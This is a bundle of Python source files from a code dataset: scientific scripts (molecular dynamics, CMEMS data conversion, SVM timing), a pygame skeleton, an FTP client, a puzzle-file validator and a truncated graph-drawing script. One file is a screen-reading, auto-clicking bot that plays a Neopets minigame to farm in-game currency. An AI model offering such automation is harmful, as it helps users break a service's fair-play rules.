self.energy=0\n self.charge=np.zeros(self.natom)\n EGCMlist=[]\n QMMol=Molnew(self.atoms,self.coords,self.totalcharge)\n self.QMMol=QMMol\n try:\n #if True:\n EGCM=(QMMol.Cal_EGCM()-GPARAMS.Esoinn_setting.scalemin)/(GPARAMS.Esoinn_setting.scalemax-GPARAMS.Esoinn_setting.scalemin)\n EGCM[ ~ np.isfinite( EGCM )] = 0\n EGCMlist.append(EGCM)\n #QMMol.belongto=self.ESOINN_MODEL.find_closest_cluster(GPARAMS.Train_setting.Modelnumperpoint,EGCM)\n if GPARAMS.Esoinn_setting.Model.class_id200:\n positions=np.array(self.coords)\n self.MMsimulation.context.setPositions(positions/10)\n self.MMstate=self.MMsimulation.context.getState(getEnergy=True,getForces=True,getPositions=True)\n self.energy=self.MMstate.getPotentialEnergy().value_in_unit(kilocalories_per_mole)\n self.force=self.MMstate.getForces(asNumpy=True).value_in_unit(kilocalories/(angstrom*mole)) \n self.recorderr=0\n AVG_ERR=999\n self.stepmethod=\"Amber\"\n ERROR_str=''\n ERROR_mols.append([QMMol,999])\n else:\n self.recorderr=AVG_ERR\n self.force=Predict[0][1]\n self.energy=Predict[0][0]\n if len(ERROR_mols)>0 and self.step-self.err_step>5:\n self.err_step=self.step\n else:\n ERROR_mols=[]\n EGCMlist=[]\n return self.force/627.51*JOULEPERHARTREE,self.energy/627.51,AVG_ERR,ERROR_mols,EGCMlist,\"\" \n def update_crd(self):\n pass\n\n","sub_path":"build/lib/ESOI_HDNN_MD/Computemethod/Allqm_amber.py","file_name":"Allqm_amber.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106257584","text":"import PIL.ImageGrab\nimport cv2\nimport sys\nimport time\nimport win32api\nimport win32con\n\n\n# The grid for the second level of Ghoul Catchers is 6 x 6 squares.\n# Each square is 40 x 40 pixels; therefore the grid is 240 x 240 pixels.\nSQUARE_LENGTH = 40\nGRID_LENGTH = 240\n\n# A list of reference images that will be used to classify each ghoul.\n# Each square will have its histogram compared with the histograms of\n# each reference image.\nIMAGE_FOLDER = 'ghouls/'\nIMAGE_FILENAMES = [\n 'chompie.png',\n 'franky.png',\n 'pinkie.png',\n 'slimy.png',\n 'ugly.png',\n 'wobbie.png'\n]\n\n\n\"\"\"\nMove the mouse cursor to (x, y) and perform a left click.\n@see https://stackoverflow.com/a/1181538\n\"\"\"\ndef click(x, y):\n win32api.SetCursorPos((x, y))\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, x, y, 0, 0)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, x, y, 0, 0)\n\n\n\"\"\"\nGenerate a histogram for an image.\n\"\"\"\ndef generate_histogram(path):\n image = cv2.imread(path)\n histogram = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\n histogram = cv2.normalize(histogram, histogram).flatten()\n\n return histogram\n\n\n\"\"\"\nRead the state of the game board.\n\"\"\"\ndef get_board(x, y):\n # Compute the histograms for each reference image.\n IMAGE_HISTOGRAMS = dict()\n for filename in IMAGE_FILENAMES:\n image = cv2.imread(IMAGE_FOLDER + filename)\n IMAGE_HISTOGRAMS[filename] = generate_histogram(IMAGE_FOLDER + filename)\n\n # Read the state of the game board.\n board = []\n for col in range(0, 6):\n board.append([])\n for row in range(0, 6):\n\n # Compute the bounding box for the square.\n box = (\n x + row * SQUARE_LENGTH,\n y + col * SQUARE_LENGTH,\n x + (row + 1) * SQUARE_LENGTH,\n y + (col + 1) * SQUARE_LENGTH\n )\n\n # Screenshot the image of the square.\n # Generate a histogram.\n PIL.ImageGrab.grab(box).save('square.png')\n histogram = generate_histogram('square.png')\n\n # Compare the square histogram and the reference histograms.\n results = dict()\n for (ghoul, ref_histogram) in IMAGE_HISTOGRAMS.items():\n results[ghoul] = cv2.compareHist(histogram, ref_histogram, cv2.HISTCMP_CORREL)\n\n # Classify the ghoul by taking the ghoul with highest correlation.\n results = sorted([(v, k) for (k, v) in results.items()], reverse=True)\n board[col].append(results[0][1])\n\n return board\n\n\n\"\"\"\nGet the next move.\n\"\"\"\ndef get_move(board):\n for row in range(0, 6):\n for col in range(0, 3):\n\n # A A B A pattern (horizontal)\n if board[row][col] == board[row][col + 1] and \\\n board[row][col] == board[row][col + 3]:\n return col + 2, row, col + 3, row\n\n # A B A A pattern (horizontal)\n if board[row][col] != board[row][col + 1] and \\\n board[row][col] == board[row][col + 2] and \\\n board[row][col] == board[row][col + 3]:\n return col, row, col + 1, row\n\n # A A B A pattern (vertical)\n if board[col][row] == board[col + 1][row] and \\\n board[col][row] == board[col + 3][row]:\n return row, col + 2, row, col + 3\n\n # A B A A pattern (vertical)\n if board[col][row] != board[col + 1][row] and \\\n board[col][row] == board[col + 2][row] and \\\n board[col][row] == board[col + 3][row]:\n return row, col, row, col + 1\n\n for row in range(0, 5):\n for col in range(0, 4):\n\n # A _ A pattern\n # _ A _ (horizontal)\n if board[row][col] == board[row][col + 2] and \\\n board[row][col] == board[row + 1][col + 1]:\n return col + 1, row, col + 1, row + 1\n\n # _ A _ pattern\n # A _ A (horizontal)\n if board[row][col + 1] == board[row + 1][col] and \\\n board[row][col + 1] == board[row + 1][col + 2]:\n return col + 1, row, col + 1, row + 1\n\n # A _ _ pattern\n # _ A A (horizontal)\n if board[row][col] == board[row + 1][col + 1] and \\\n board[row][col] == board[row + 1][col + 2]:\n return col, row, col, row + 1\n\n # _ A A pattern\n # A _ _ (horizontal)\n if board[row + 1][col] == board[row][col + 1] and \\\n board[row + 1][col] == board[row][col + 2]:\n return col, row, col, row + 1\n\n # _ _ A pattern\n # A A _ (horizontal)\n if board[row][col + 2] == board[row + 1][col] and \\\n board[row][col + 2] == board[row + 1][col + 1]:\n return col + 2, row, col + 2, row + 1\n\n # A A _ pattern\n # _ _ A (horizontal)\n if board[row + 1][col + 2] == board[row][col] and \\\n board[row + 1][col + 2] == board[row][col + 1]:\n return col + 2, row, col + 2, row + 1\n\n # A _ A pattern\n # _ A _ (vertical)\n if board[col][row] == board[col + 2][row] and \\\n board[col][row] == board[col + 1][row + 1]:\n return row, col + 1, row + 1, col + 1\n\n # _ A _ pattern\n # A _ A (vertical)\n if board[col + 1][row] == board[col][row + 1] and \\\n board[col + 1][row] == board[col + 2][row + 1]:\n return row, col + 1, row + 1, col + 1\n\n # A _ _ pattern\n # _ A A (vertical)\n if board[col][row] == board[col + 1][row + 1] and \\\n board[col][row] == board[col + 2][row + 1]:\n return row, col, row + 1, col\n\n # _ A A pattern\n # A _ _ (vertical)\n if board[col][row + 1] == board[col + 1][row] and \\\n board[col][row + 1] == board[col + 2][row]:\n return row, col, row + 1, col\n\n # _ _ A pattern\n # A A _ (vertical)\n if board[col + 2][row] == board[col][row + 1] and \\\n board[col + 2][row] == board[col + 1][row + 1]:\n return row, col + 2, row + 1, col + 2\n\n # A A _ pattern\n # _ _ A (vertical)\n if board[col + 2][row + 1] == board[col][row] and \\\n board[col + 2][row + 1] == board[col + 1][row]:\n return row, col + 2, row + 1, col + 2\n\n\n\"\"\"\nGhoul Catchers bot entry point.\n\"\"\"\ndef main():\n # 1. Start Ghoul Catchers, login to Neopets, and begin level 2.\n # Do this before executing this bot.\n print(' ┍━━━━━━━━━━━━━━━━━━━━━━━━━━━┑')\n print(' │ Nuttywhal\\'s Ghoul Catcher │')\n print(' ┕━━━━━━━━━━━━━━━━━━━━━━━━━━━┙')\n print()\n print(' (1) Open Ghoul Catchers in Bluestacks.')\n print(' (2) Login to your Neopets account.')\n print(' (3) Start the second level.')\n print(' (4) Move your mouse cursor to the top-left of the 6x6 grid.')\n print()\n input(' Press the enter key to continue...')\n print()\n print(' Starting in ', end='')\n\n for i in range(5, 0, -1):\n time.sleep(1)\n print(str(i) + '.. ', end='')\n sys.stdout.flush()\n\n print()\n print()\n\n # 2. Execute this bot with the mouse cursor hovered over the top-left\n # corner of the game board.\n x, y = win32api.GetCursorPos()\n\n # 3. Let the bot do its thing. Enjoy your 50k NP!\n for game in range(100):\n print('Playing game #' + str(game) + '...')\n\n for move in range(0, 8):\n\n # Get the next move.\n board = get_board(x, y)\n x1, y1, x2, y2 = get_move(board)\n\n # Make move.\n click(x + x1 * SQUARE_LENGTH + 20,\n y + y1 * SQUARE_LENGTH + 20)\n time.sleep(1.5)\n click(x + x2 * SQUARE_LENGTH + 20,\n y + y2 * SQUARE_LENGTH + 20)\n time.sleep(5)\n\n # Click on restart button to restart the level.\n time.sleep(5)\n click(x + 125, y + 200)\n\n # Wait for the level to load.\n time.sleep(20)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bots/neopets/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"312780764","text":"import re\nimport datetime\nimport time\nimport glob, os, shutil\nimport subprocess\nimport h5py\nimport numpy as np\n\ndirpath = os.getcwd()\n\ninput_file = \"CMEMS_BIO2HDF5.dat\"\n\ndownload_dir = (dirpath+\"\\CMEMS_Download\")\nConvertToHdf5_dir = (dirpath+\"\\ConvertToHdf5\")\n\nbackup_path = (dirpath+\"\\Backup\")\n\n#####################################################\ndef read_date():\n\tglobal initial_date, initial_date_download\n\tglobal end_date, end_date_download\n\t#global number_of_runs\n\tglobal forecast_mode\n\t\n\tforecast_mode = 0\n\trefday_to_start = 0\n\t\n\twith open(input_file) as file:\n\t\tfor line in file:\n\t\t\tif re.search(\"^FORECAST_MODE.+:\", line):\n\t\t\t\tnumber = line.split()\n\t\t\t\tforecast_mode = int(number[2])\n\t\t\t\t\n\tif forecast_mode == 1:\n\t\twith open(input_file) as file:\n\t\t\tfor line in file:\n\t\t\t\tif re.search(\"^REFDAY_TO_START.+:\", line):\n\t\t\t\t\tnumber = line.split()\n\t\t\t\t\trefday_to_start = int(number[2])\n\t\t\t\t\t\n\t\tinitial_date_download = datetime.datetime.now() - datetime.timedelta(days = 11 - refday_to_start)\n\t\tend_date_download = datetime.datetime.now() + datetime.timedelta(days = 7)\n \t\t\t\t\t\t\n\telse:\n\t\twith open(input_file) as file:\n\t\t\tfor line in file:\n\t\t\t\tif re.search(\"^START.+:\", line):\n\t\t\t\t\tnumber = line.split()\n\t\t\t\t\tinitial_date = datetime.datetime(int(number[2]),int(number[3]),int(number[4]),int(number[5]),int(number[6]),int(number[7]))\n\t\t\t\telif re.search(\"^END.+:\", line):\n\t\t\t\t\tnumber = line.split()\n\t\t\t\t\tend_date = datetime.datetime(int(number[2]),int(number[3]),int(number[4]),int(number[5]),int(number[6]),int(number[7]))\n\t\t\t\n\t\tinitial_date_download = initial_date - datetime.timedelta(days = 7)\n\t\tend_date_download = end_date\n\t\t\n\t# with open(input_file) as file:\n\t\t# for line in file:\n\t\t\t# if re.search(\"^START.+:\", line):\n\t\t\t\t# words = line.split()\n\t\t\t\t# initial_date = datetime.datetime(int(words[2]),int(words[3]),int(words[4]),int(words[5]),int(words[6]),int(words[7]))\n\t\t\t# elif re.search(\"^END.+:\", line):\n\t\t\t\t# words = line.split()\n\t\t\t\t# end_date = datetime.datetime(int(words[2]),int(words[3]),int(words[4]),int(words[5]),int(words[6]),int(words[7]))\n\t\t\t\t\t\n\t#interval = end_date - initial_date\n\t\n\t#number_of_runs = interval.days/7\n#####################################################\n#def next_date (run):\n#\tglobal next_start_date\n#\tglobal next_end_date\n\t\t\n#\tnext_start_date = initial_date + datetime.timedelta(days = run*7)\n#\tnext_end_date = initial_date + datetime.timedelta(days = run*7+7)\n\n#####################################################\ndef write_date(file_name):\n\t\t\n\twith open(file_name) as file:\n\t\tfile_lines = file.readlines()\n\t\t\n\tnumber_of_lines = len(file_lines)\n\t\n\tfor n in range(0,number_of_lines):\n\t\tline = file_lines[n]\t\t\n\t\tif re.search(\"^START.+:\", line):\n\t\t\t#file_lines[n] = \"START \" + \": \" + str(next_start_date.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\t#file_lines[n] = \"START \" + \": \" + str(initial_date_download.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\tfile_lines[n] = \"START \" + \": \" + str(initial_date_download.strftime(\"%Y %m %d \")) + \"12 0 0\" + \"\\n\"\n\n\n\t\telif re.search(\"^END.+:\", line):\t\n\t\t\t#file_lines[n] = \"END \" + \": \" + str(next_end_date.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\t#file_lines[n] = \"END \" + \": \" + str(end_date_download.strftime(\"%Y %m %d %H %M %S\")) + \"\\n\"\n\t\t\tfile_lines[n] = \"END \" + \": \" + str(end_date_download.strftime(\"%Y %m %d \")) + \"12 0 0\" + \"\\n\"\n\t\t\t\n\twith open(file_name,\"w\") as file:\n\t\tfor n in range(0,number_of_lines) :\n\t\t\tfile.write(file_lines[n])\n\n#####################################################\n\nread_date()\n\n#for run in range (0,number_of_runs):\t\n\t\n#Update dates\n#next_date (run)\n\n#Download\nos.chdir(download_dir)\n\nfiles = glob.glob(\"*.nc\")\nfor filename in files:\n\tos.remove(filename)\n\t\nfile_name = \"CMEMS_BIO_DOWNLOAD.DAT\"\nwrite_date(file_name)\t\noutput = subprocess.call([\"CMEMS_BIO_DOWNLOAD.bat\"])\n\nnc_files = glob.iglob(os.path.join(download_dir,\"*.nc\"))\nfor file in nc_files:\n\tshutil.copy(file, ConvertToHdf5_dir)\n\n\t\n#ConvertToHdf5\nos.chdir(ConvertToHdf5_dir)\n\nfiles = glob.glob(\"*.hdf*\")\nfor filename in files:\n\tos.remove(filename)\n\t\noutput = subprocess.call([\"ConvertToHdf5.bat\"])\n\nif forecast_mode == 1:\n\toutput_dir = backup_path\n\t\n\tif not os.path.exists(output_dir):\n\t\tos.makedirs(output_dir)\n\n\thdf_files = glob.iglob(os.path.join(ConvertToHdf5_dir,\"*.hdf*\"))\n\tfor file in hdf_files:\n\t\tshutil.copy(file, output_dir)\n\n\tfiles = glob.glob(\"*.nc\")\n\tfor filename in files:\n\t\tos.remove(filename)\n\t\t\n\thdf5path = (os.path.join(output_dir,\"Plataforma_SE_Bio.hdf5\"))\n\n\thdf = h5py.File(hdf5path, 'r+')\n\tgroup = hdf[\"Time\"]\n\tTime = group[\"Time_00002\"].value\n\n\thdf_enddate = datetime.datetime(int(Time[0]),int(Time[1]),int(Time[2]),int(Time[3]),int(Time[4]),int(Time[5])) \n\n\thdf_enddate_plus7 = hdf_enddate + datetime.timedelta(days = 7)\n\n\t#Time = [\"{:.3E}\".format(int(hdf_enddate_plus7.strftime(\"%Y\"))) , \"{:.3E}\".format(int(hdf_enddate_plus7.strftime(\"%m\"))),\"{:.3E}\".format(int(hdf_enddate_plus7.strftime(\"%d\"))),\"{:.3E}\".format(int(12)),\"{:.3E}\".format(int(0)),\"{:.3E}\".format(int(0))]\n\n\tdata = hdf[\"Time/Time_00002\"]\n\tdata[...] = (int(hdf_enddate_plus7.strftime(\"%Y\")), int(hdf_enddate_plus7.strftime(\"%m\")), int(hdf_enddate_plus7.strftime(\"%d\")), 12, 0, 0 )\n\n\thdf.close()\n\nelse:\n\t#output_dir = backup_path+\"\\\\\"+str(next_start_date.strftime(\"%Y\"))+\"\\\\\"+str(next_start_date.strftime(\"%m\"))+\"\\\\\"+str(next_start_date.strftime(\"%Y%m%d\")) + \"_\" + str(next_end_date.strftime(\"%Y%m%d\"))\n\toutput_dir = backup_path+\"\\\\\"+\"\\\\\"+str(initial_date.strftime(\"%Y%m%d\")) + \"_\" + str(end_date.strftime(\"%Y%m%d\"))\n\t\n\tif not os.path.exists(output_dir):\n\t\tos.makedirs(output_dir)\n\n\thdf_files = glob.iglob(os.path.join(ConvertToHdf5_dir,\"*.hdf*\"))\n\tfor file in hdf_files:\n\t\tshutil.copy(file, output_dir)\n\n\tfiles = glob.glob(\"*.nc\")\n\tfor filename in files:\n\t\tos.remove(filename)","sub_path":"Aplica_OP/Work/CMEMS/GLOBAL_ANALYSIS_FORECAST_BIO/CMEMS_BIO2HDF5.py","file_name":"CMEMS_BIO2HDF5.py","file_ext":"py","file_size_in_byte":5739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491699411","text":"from svm_pegasos import SVMPegasos\nimport numpy as np\nimport sys\nimport time\nfrom os.path import isfile\n\n\ndef read_file(filename):\n assert isfile(filename)\n data = np.genfromtxt(filename, delimiter=',')\n print('successfully loaded', filename)\n return data\n\n\ndef myPegasos(filename, k, numruns):\n numruns = int(numruns)\n k = int(k)\n assert(numruns > 0 and k > 0)\n data = read_file(filename)\n X = data[:, 1:]\n y = data[:, 0]\n time_array = np.zeros(numruns)\n loss_list = []\n\n print(numruns, 'runs on', k, 'data points')\n for i in range(numruns):\n print('run ', i + 1, \"/\", numruns, \", please wait...\", end=\"\\r\")\n begin = time.time()\n model = SVMPegasos(X, y, k)\n loss_list.append(model.loss_record)\n end = time.time()\n time_array[i] = end - begin\n\n time_avg = np.mean(time_array)\n time_std = np.std(time_array, ddof=1)\n print('------')\n print('average runtime for ', numruns, ' runs with minibatch size of ', k, ':', round(time_avg, 3), 'seconds')\n print('SD of run time for ', numruns, ' runs with minibatch size of ', k, ':', round(time_std, 3), 'seconds')\n\n\ndef main(argv=sys.argv):\n if len(argv) == 4:\n myPegasos(*argv[1:])\n else:\n print('Usage: python3 ./my_pegasos.py /path/to/dataset.csv k numruns', file=sys.stderr)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"HW2/code/my_pegasos.py","file_name":"my_pegasos.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561894724","text":"''' main file for game '''\n\n# import libraries + files\nimport pygame as pg\n#import random\nimport settings\n#import sprites\n\nclass Main:\n ''' main class for our game '''\n def __init__(self):\n ''' setup pygame '''\n pg.init() \n pg.mixer.init()\n self.screen = pg.display.set_mode((settings.WIDTH, settings.HEIGHT))\n pg.display.set_caption(settings.TITLE)\n self.clock = pg.time.Clock()\n self.running = True\n\n # variables used within other methods\n self.all_sprites = None\n self.playing = None\n\n def new(self):\n ''' create a new game '''\n self.all_sprites = pg.sprite.Group()\n self.run()\n\n def run(self):\n ''' game loop '''\n self.playing = True\n while self.playing:\n self.clock.tick(settings.FPS)\n self.events()\n self.update()\n self.draw()\n\n def update(self):\n ''' game loop - update '''\n self.all_sprites.update()\n\n\n def events(self):\n ''' game loop - events '''\n for event in pg.event.get():\n if event.type == pg.QUIT:\n if self.playing:\n self.playing = False\n self.running = False\n\n def draw(self):\n ''' game loop - draw '''\n self.screen.fill(settings.BLACK)\n self.all_sprites.draw(self.screen)\n pg.display.flip()\n\n def show_start_screen(self):\n ''' start-screen for game '''\n\n def show_go_screen(self):\n ''' game-over screen for game '''\n\ndef game():\n ''' method for creating instance of Game '''\n g = Main()\n g.show_start_screen()\n while g.running:\n g.new()\n g.show_go_screen()\n pg.quit()\n\n\n\nif __name__ == '__main__':\n game()\n","sub_path":"justice_league_game/part_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"259034016","text":"# -*- coding: UTF-8 -*-\nimport socket\nimport os\nimport json\nimport hashlib\nimport sys\n\n\nclass FtpClient(object):\n\n # 定义一个变量存储当前工作目录\n work_path = ''\n # print(work_path)\n\n def __init__(self):\n self.client = socket.socket()\n self.authentication = False # 判断是否登入\n\n def help(self): # 打印指令信息\n msg = '''\n ls - 列出该目录下所有文件和文件夹\n pwd - 显示当前工作目录\n cd - cd . 当前工作目录\n cd .. 上一级工作目录\n cd dirname 切换到当前工作目录下的dirname目录\n\n get - get filename 下载文件\n put - put G:/ftp/home/***.txt 上传文件\n mkdir - mkdir dirname 创建目录\n '''\n print(msg)\n\n def connect(self, ip, port):\n self.client.connect((ip, port))\n\n def interactive(self):\n # 交换模块\n while True:\n cmd = input(\"[root@ftp_server %s]$:\" % (self.work_path.split(os.sep)[-1])).strip()\n if len(cmd) == 0:\n continue\n cmd_str = cmd.split()[0]\n # 使用反射\n if hasattr(self, 'cmd_%s' % cmd_str):\n func = getattr(self, 'cmd_%s' % cmd_str)\n func(cmd) # 执行命令\n\n else:\n self.help()\n\n def authenticate(self):\n # 登入认证\n while True:\n account_name = input('请输入用户名:').strip()\n account_passwd = input('请输入密码:').strip()\n account_m = hashlib.md5()\n account_m.update(account_passwd.encode('utf-8'))\n passwd_md5 = account_m.hexdigest()\n # print(passwd_md5)\n acc_msg = {\n 'username': account_name,\n 'password': passwd_md5,\n 'action': 'authenticate'\n }\n # print(acc_msg)\n # 发送登入信息给服务端确认\n self.client.send(json.dumps(acc_msg).encode())\n # 接受服务端返回的认证结果\n acc_response = self.client.recv(1024).strip()\n recv_msg = json.loads(acc_response.decode())\n if recv_msg['status'] == 'ok':\n print('登入成功')\n self.authentication = True\n self.work_path = recv_msg['work_dir']\n self.interactive()\n else:\n print(recv_msg['status'])\n continue\n\n def cmd_put(self, *args):\n # 上传文件,文件路径为全路径,如: G:\\test\\test.txt\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n file_path = cmd_split[1]\n path_list = file_path.split(os.sep)\n # 判断文件目录是否存在\n dir_path = os.sep.join(path_list[:-1])\n if os.path.exists(dir_path):\n filename = path_list[-1]\n if os.path.isfile(file_path):\n file_size = os.stat(file_path).st_size\n # 将文件名、大小等信息传给服务端,为了一些其他判断,可以预先使用json格式\n msg_dict = {\n 'filename': filename,\n 'size': file_size,\n 'work_dir': self.work_path,\n 'overridden': False,\n 'action': 'put'\n }\n self.client.send(json.dumps(msg_dict).encode())\n # 防止粘包,等服务器确认\n server_response = self.client.recv(1024).strip()\n # print(server_response.decode())\n # 如果返回的值是200,表示空间足够,500表示空间不足\n if server_response.decode() == '200':\n # 进度条标识\n bar = '>'\n send_size = 0\n\n f = open(file_path, 'rb')\n for line in f:\n self.client.send(line)\n\n # 上传进度条\n send_size += len(line)\n percent = int(float(send_size) / float(file_size) * 100)\n # print(percent)\n sys.stdout.write('\\r' + '[' + bar * percent +\n ' ' * (100 - percent) + ']' + str(percent) + '%')\n sys.stdout.flush()\n if percent == 100:\n sys.stdout.write('\\n')\n\n f.close()\n\n print('file upload successfully')\n\n else:\n print('错误代码{}: space not enough'.format(server_response.decode()))\n else:\n print(filename, 'is not exist')\n else:\n print('the directory is not exist')\n else:\n print('please input the filename.')\n\n def cmd_get(self, *args):\n # 下载文件\n cmd_list = args[0].split()\n if len(cmd_list) > 1:\n filename = cmd_list[1]\n get_msg = {\n 'filename': filename,\n 'work_dir': self.work_path,\n 'action': 'get'\n }\n # 发送文件信息给服务端\n self.client.send(json.dumps(get_msg).encode())\n # 接受服务端返回的信息\n get_response = self.client.recv(1024)\n info_dict = json.loads(get_response.decode())\n if info_dict['status'] == '200':\n file_size = info_dict['file_size']\n # 选择存储文件的位置\n storage_dir = input('输入保存文件的位置:')\n while os.path.exists(storage_dir) is not True:\n print('该文件夹不存在,请重新输入')\n storage_dir = input('输入保存文件的位置:')\n else:\n # 进度条\n bar = '>'\n # 文件接收,并判断是否续传, 存在文件则续传\n file_path = os.sep.join([storage_dir, filename])\n if os.path.isfile(file_path + '.temp'):\n received_size = os.stat(file_path + '.temp').st_size\n else:\n received_size = 0\n # 回复服务端信息,防止服务端粘包\n response_msg = {\n 'seek_location': received_size,\n 'status': '200'\n }\n self.client.send(json.dumps(response_msg).encode())\n try:\n f = open(file_path + '.temp', 'wb')\n f.seek(received_size)\n while received_size < file_size:\n if file_size - received_size > 1024:\n r_data = self.client.recv(1024)\n else:\n r_data = self.client.recv(file_size - received_size)\n received_size += len(r_data)\n f.write(r_data)\n f.flush()\n percent = int(float(received_size) / float(file_size) * 100)\n # print(percent)\n sys.stdout.write('\\r' + '[' + bar * percent +\n ' ' * (100 - percent) + ']' + str(percent) + '%')\n sys.stdout.flush()\n if percent == 100:\n sys.stdout.write('\\n')\n else:\n f.close()\n # 重命名.temp 结尾的文件\n os.rename(file_path + '.temp', file_path)\n\n except KeyboardInterrupt as e:\n print(e)\n\n else:\n print('错误代码{}: file not exist')\n else:\n print('please input the filename.')\n\n def cmd_ls(self, *args):\n # 显示目录下内容\n cmd_msg = {\n 'word_path': self.work_path,\n 'action': 'ls'\n }\n self.client.send(json.dumps(cmd_msg).encode('utf-8'))\n # 接受服务端返回的信息\n ls_response = self.client.recv(1024)\n recv_dict = json.loads(ls_response.decode())\n if recv_dict['status'] == '200':\n # 显示目录下的文件和文件夹信息\n for i in recv_dict['dir_info']:\n print(i)\n else:\n print('错误代码{}:{}'.format(recv_dict['status'], recv_dict['dir_info']))\n\n def cmd_cd(self, *args):\n # 切换目录\n # 记录现有目录位置,如果切换错误,就停留在原本目录\n original_path = self.work_path\n # print(original_path)\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n dir_name = cmd_split[1]\n # 判断切换的路径是否一直在用户家目录中\n dir_list = dir_name.split('/')\n # cd '.'的情况\n dot_num = dir_list.count('.')\n # cd '..'的情况\n double_dot_num = dir_list.count('..')\n # 目录名称的情况\n dirs_list = dir_list[dot_num + double_dot_num:]\n\n if dir_list[:] == '.':\n workspace = self.work_path\n elif double_dot_num > 0:\n workspace = os.sep.join(self.work_path.split(os.sep)[:-double_dot_num])\n if len(workspace.split(os.sep)) < 4:\n print('403,禁止切换到家目录以外')\n else:\n workspace = os.sep.join(self.work_path.split(os.sep)[:-double_dot_num] + dirs_list)\n else:\n work_path_list = self.work_path.split(os.sep)\n new_path_list = work_path_list + dirs_list\n workspace = os.sep.join(new_path_list)\n cd_msg = {\n 'workspace': workspace, # 目录路径\n 'action': 'cd'\n }\n self.client.send(json.dumps(cd_msg).encode())\n # 服务端验证结果\n cd_response = self.client.recv(1024)\n\n if cd_response.decode() == '200':\n self.work_path = workspace\n elif cd_response.decode() == '403':\n self.work_path = original_path\n # print('错误代码{}: can not change directory out of ftp home'.format(cd_response.decode()))\n else:\n print('错误代码{}: directory not exits'.format(cd_response.decode()))\n\n else:\n print('please input the directory.')\n\n def cmd_pwd(self, *args):\n # 显示路径\n print(self.work_path)\n\n def cmd_mkdir(self, *args):\n # 创建文件夹, 支持 aaa/bbb 递归\n cmd_list = args[0].split()\n if len(cmd_list) > 1:\n dirs = cmd_list[1].split('/')\n work_path_list = self.work_path.split(os.sep)\n dir_path_list = work_path_list + dirs\n dir_path = os.sep.join(dir_path_list)\n # 传递给服务端\n make_msg = {\n 'dir_path': dir_path,\n 'action': 'mkdir'\n }\n self.client.send(json.dumps(make_msg).encode())\n recv_data = self.client.recv(1024)\n if recv_data.decode() == '200':\n print('makedir successfully.')\n else:\n print('makedir unsuccessfully')\n else:\n print('please input the directory name')\n\n\ndef run():\n ftp_client = FtpClient()\n ftp_client.connect('localhost', 9999)\n ftp_client.authenticate()\n","sub_path":"Selectors_Ftp/my_ftp_client/core/ftp_client.py","file_name":"ftp_client.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14136441","text":"import os\nimport re\nimport logging\nimport argparse\nimport itertools\n\n\nclass FileCheckerAction(argparse.Action):\n @staticmethod\n def _check_map(file_name: str):\n with open(file_name, \"r\") as f:\n fdata = list(\n filter(None, [re.match(\"[0-9 ]+\", r) for r in f.read().split(\"\\n\")])\n )\n try:\n size = int(fdata[0].group())\n except ValueError:\n raise ValueError(f\"Puzzle size too low\")\n p = sorted(\n map(\n int,\n list(\n itertools.chain(\n *[list(filter(None, x.group().split(\" \"))) for x in fdata[1:]]\n )\n ),\n )\n )\n if p != list(range(size ** 2)):\n raise ValueError(f\"Bad number in Puzzle provided\")\n logging.info(\"File is valid\")\n\n def __init__(self, option_strings, dest, nargs=None, **kwargs):\n if nargs is not None:\n raise ValueError(\"nargs not allowed\")\n super().__init__(option_strings, dest, **kwargs)\n\n def __call__(self, parser, namespace, values, option_string=None):\n if not os.path.exists(values) or os.path.splitext(values)[1] != \".txt\":\n raise ValueError(\n f\"File '{values}' does not exist or is in the wrong format (TXT)\"\n )\n self._check_map(values)\n setattr(namespace, self.dest, values)\n","sub_path":"srcs/args/FileCheckerAction.py","file_name":"FileCheckerAction.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"428741740","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom sys import stdin\nfrom ctypes import cdll\nfrom ctypes import c_char_p\nfrom ctypes import c_uint\nfrom ctypes import c_double\nlib = cdll.LoadLibrary ('lib/libgraf.so')\n\n\ndef prepareGraph (obj, action):\n\tobj = lib.newGraphDrawerAM(graph)\n\tg = nx.Graph()\n\tfor i in range(lib.GetNodes(obj)):\n\t\tg.add_node(i)\n\t\tfor j in range(lib.Nbors(obj,i)):\n\t\t\tg.add_edge(i,lib.GetVal(obj,i,j))\n\tpos = nx.shell_layout(g)\n\tnx.draw_networkx_nodes(g,pos,node_size=300)\n\tnx.draw_networkx_edges(g,pos)\n\tnx.draw_networkx_labels(g,pos)\n\t#plt.title(\"Graph Title\")\n\tplt.axis('off') \n\tif action == \"d\":\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(action)\n\t \ndef draw(obj):\n\tprepareGraph(obj, \"d\")\n\ndef save(graph):\n\tname = \"save/\" + raw_input(\"File name: \")\n\tlib.save(graph, c_char_p(name))\n\tprepareGraph(graph, name+\".png\")\n\ndef show(graph):\n\tlib.show(graph)\n\ndef menu():\n\tprint(\"New graph: 